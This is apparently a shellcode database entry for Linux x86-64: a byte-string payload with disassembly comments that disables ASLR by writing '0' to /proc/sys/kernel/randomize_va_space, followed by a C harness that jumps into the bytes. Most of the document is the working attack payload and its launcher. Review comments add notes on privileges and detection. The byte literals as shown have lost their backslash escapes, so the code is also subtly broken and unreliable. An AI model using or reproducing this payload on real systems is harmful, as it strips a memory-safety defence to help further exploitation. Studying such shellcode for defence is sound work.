
# Title : Linux/x86-64 - Disable ASLR Security - 143 bytes
# Published : 2010-06-17
# Author : Jonathan Salwan


/*
Title:  Linux/x86-64 - Disable ASLR Security - 143 bytes
Date:   2010-06-17
Tested: Archlinux x86_64 k2.6.33

Author: Jonathan Salwan
Web:    http://shell-storm.org | http://twitter.com/shell_storm

! Database of shellcodes http://www.shell-storm.org/shellcode/


Description:
============
 Address space layout randomization (ASLR) is a computer security technique
 which involves randomly arranging the positions of key data areas, usually
 including the base of the executable and the positions of libraries, heap, and
 stack, in a process's address space.

 This shellcode disables ASLR by writing "0" to /proc/sys/kernel/randomize_va_space.

*/

#include <stdio.h>
#include <string.h>


/*
 * Payload bytes: three raw Linux x86-64 system calls in sequence --
 * open (nr 2), write (nr 1) and exit (nr 60 / 0x3c) -- each selected by
 * loading %al before `syscall`.
 *
 * NOTE(review): in this rendering the literals read "x48x31xd2" with no
 * backslash, so as written they compile to ASCII text rather than the
 * opcodes shown in the disassembly comments; the `\x` escape prefixes
 * look like they were lost in extraction -- confirm against the original.
 *
 * Privilege / detection: on a stock kernel randomize_va_space is owned by
 * root with mode 0644, so the open() below fails for an unprivileged
 * caller. For defenders, any write of "0" to this path is a hardening
 * downgrade worth auditing (e.g. a file-watch rule on that sysctl).
 */
char *SC = 
           /*  open("/proc/sys/kernel/randomize_va_space", O_WRONLY|O_CREAT|O_APPEND, 0644)
            *
            *  0x441 == O_WRONLY|O_CREAT|O_APPEND, 0x1a4 == 0644. The path is
            *  assembled on the stack 8 bytes at a time, last fragment first;
            *  the 0xff filler of the 3-byte tail ("ace") is shifted out with
            *  shr so no NUL byte appears in the payload. */

           "x48x31xd2"                                // xor    %rdx,%rdx
           "x48xbbxffxffxffxffxffx61x63x65"    // mov    $0x656361ffffffffff,%rbx
           "x48xc1xebx28"                            // shr    $0x28,%rbx    -> "ace\0" (NUL terminator via the shift)
           "x53"                                        // push   %rbx
           "x48xbbx7ax65x5fx76x61x5fx73x70"    // mov    $0x70735f61765f657a,%rbx   "ze_va_sp"
           "x53"                                        // push   %rbx
           "x48xbbx2fx72x61x6ex64x6fx6dx69"    // mov    $0x696d6f646e61722f,%rbx   "/randomi"
           "x53"                                        // push   %rbx
           "x48xbbx73x2fx6bx65x72x6ex65x6c"    // mov    $0x6c656e72656b2f73,%rbx   "s/kernel"
           "x53"                                        // push   %rbx
           "x48xbbx2fx70x72x6fx63x2fx73x79"    // mov    $0x79732f636f72702f,%rbx   "/proc/sy"
           "x53"                                        // push   %rbx
           "x48x89xe7"                                // mov    %rsp,%rdi   -> pathname
           "x66xbex41x04"                            // mov    $0x441,%si  -> flags; only the low 16 bits of %rsi are set,
                                                        //                      so this relies on the upper bits already being zero
                                                        //                      (unlike %rdx, which was cleared above)
           "x66xbaxa4x01"                            // mov    $0x1a4,%dx  -> mode 0644
           "x48x31xc0"                                // xor    %rax,%rax
           "xb0x02"                                    // mov    $0x2,%al    -> SYS_open
           "x0fx05"                                    // syscall


           /* write(3, "0\n", 2)
            *
            *  The fd is hard-coded to 3; the descriptor open() returned in
            *  %rax is not used, so this assumes only fds 0-2 were open when
            *  the payload started. Constants are again built with an 0xff
            *  filler and shifted down to avoid NUL bytes. */

           "x48xbfxffxffxffxffxffxffxffx03"    // mov    $0x3ffffffffffffff,%rdi
           "x48xc1xefx38"                            // shr    $0x38,%rdi   -> 3
           "x48xbbxffxffxffxffxffxffx30x0a"    // mov    $0xa30ffffffffffff,%rbx
           "x48xc1xebx30"                            // shr    $0x30,%rbx   -> "0\n"
           "x53"                                        // push   %rbx
           "x48x89xe6"                                // mov    %rsp,%rsi   -> buf
           "x48xbaxffxffxffxffxffxffxffx02"    // mov    $0x2ffffffffffffff,%rdx
           "x48xc1xeax38"                            // shr    $0x38,%rdx   -> count 2
           "x48x31xc0"                                // xor    %rax,%rax
           "xb0x01"                                    // mov    $0x1,%al    -> SYS_write
           "x0fx05"                                    // syscall


           /* _exit(0) -- no error handling: if open() or write() failed the
            *  process still exits 0. */

           "x48x31xff"                                // xor    %rdi,%rdi   -> status 0
           "x48x31xc0"                                // xor    %rax,%rax
           "xb0x3c"                                    // mov    $0x3c,%al   -> SYS_exit
           "x0fx05";                                   // syscall


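/*
 * Print the payload length, then transfer control to it.
 *
 * strlen() is a valid length measure here only because the byte string
 * holds no 0x00; %zu matches the size_t it returns (the original used %d,
 * which is a format/argument mismatch).
 *
 * NOTE(review): the bytes live in a string literal, i.e. a read-only,
 * non-executable section on current default toolchains, so the indirect
 * call is expected to fault unless the binary was built with that data
 * executable -- confirm before relying on this harness.
 */
int main(void)
{
        fprintf(stdout, "Length: %zu\n", strlen(SC));
        (*(void(*)()) SC)();
        return 0;
}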